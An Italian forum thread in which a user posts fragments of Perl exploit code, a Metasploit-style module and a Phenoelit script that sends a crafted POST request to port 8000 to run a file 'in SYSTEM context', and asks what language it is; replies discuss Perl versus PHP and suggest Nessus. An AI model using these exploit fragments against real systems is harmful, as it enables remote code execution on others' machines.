In che linguaggio è scritto questo programma ?

[l'uomo ragno]

Domanda magari banale per alcuni ma non per me, sapete dirmi in che linguaggio è scritto questo programma ?

questo è parte del programma :

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;

my $target = $self->Targets->[$target_idx];

$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);




Grazie.

[cionci]

Perl...ad occhio...

[l'uomo ragno]

Quote:

Originariamente inviato da cionci
Perl...ad occhio...

Questa è un altra parte :

$request = "POST /plugins/framework/script/content.hts HTTP/1.0\r\n".
"Host: ".$host."\r\n".
"Accept: text/html, text/plain, application/pdf, image/*, ".
"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
" image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
"Accept-Language: en\r\n".
"Pragma: no-cache\r\n".
"Cache-Control: no-cache\r\n".
"User-Agent: Phenoelit script\r\n".
"Referer: http://www.phenoelit.de/\r\n".
"Content-type: application/x-www-form-urlencoded\r\n".
"Content-length: ".length($cont)."\r\n\r\n".
$cont;

print "If everything works well, the specified file should be running\n".
" soon in SYSTEM context. Don't stop this script until your program\n".
" terminates. Enjoy the box.\n";
&doit();

} else {
print "Host OS (".$system.") not supported by exploit - modify it\n";
}

exit 0;


sub doit {
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>"8000",);
die "cannot connect to http daemon on $host\n" unless($remote);
$remote->autoflush(1);
print $remote $request;

$rs="";
while ( $rline=<$remote> ) {
$rs.=$rline;
#print $rline;
}

close $remote;
}


Dovrei studiare questo linguaggio ma non lo conosco per nulla, è molto complesso ?

C'è un compilatore anche per il perl ?

Grazie e scusa se sono domande già risposte nelle Faq.

[cionci]

Perl è interpretato...
Trovi un interprete solitamente già installato nelle distro Linux...

Altrimenti lo trovi qui: http://www.activeperl.com/Products/D...?id=ActivePerl

Un tempo era molto diffuso come linguaggio di scripting per il web (php ha preso praticamente il suo posto, tra l'altro gli somiglia anche)...

[l'uomo ragno]

Quote:

Originariamente inviato da cionci
Perl è interpretato...
Trovi un interprete solitamente già installato nelle distro Linux...

Altrimenti lo trovi qui: http://www.activeperl.com/Products/D...?id=ActivePerl

Un tempo era molto diffuso come linguaggio di scripting per il web (php ha preso praticamente il suo posto, tra l'altro gli somiglia anche)...

Cosa mi consigli di studiarmi il php e lasciar perdere il perl perchè è sorpassato ?

[cionci]

Diepnde per quali applicazioni ti interesserebbe usarlo

[abxide]

Quote:

Originariamente inviato da l'uomo ragno
Cosa mi consigli di studiarmi il php e lasciar perdere il perl perchè è sorpassato ?

Il perl non e' affatto sorpassato, è un linguaggio molto potente che si presta a vari utilizzi.

[l'uomo ragno]

Quote:

Originariamente inviato da cionci
Diepnde per quali applicazioni ti interesserebbe usarlo

Trovare falle e aumentare la sicurezza della mia rete aziendale, risparmierei molto se riuscissi a farlo io.

[cionci]

E ti serve Perl per farlo ?!?!?
Per trovare falle ci sono decine di sorgenti e strumenti già pronti
Perl non ha niente di più di qualsiasi altro linguaggio in questo campo...

[sikur3zza]

Behh.. inizierei a dirti ke il Perl è tutt'ora un ottimo linguaggio di estrazione e rielaborazione testi. Non è per nulla sorpassato.
Io lo uso tutt'ora con l'ausilio di altri a seconda delle esigenze!
Il php ha "preso" il suo posto solo per la maggior facilità di utilizzo, ma per adoperarlo è necessario avere un server web come apache... non ha output se non web visto ke rielabora il codice e lo trasforma in html.
Quindi un grande consiglio mi sento di dartelo.
Cerca di capire a cosa ti serve un linguaggio. Se per fare pagine dinamike html e basta allora usa pure il php ke è piuttosto immediato. Il Perl è + "sistemistico" e potente con usi piu' disparati, anke slegati dal web.

Devi trovare falle e vulnerabilità?!!?
Comincia con nessus. Tool potente e già fatto ad hoc.
Ciao e buon lavoro!!! ;-)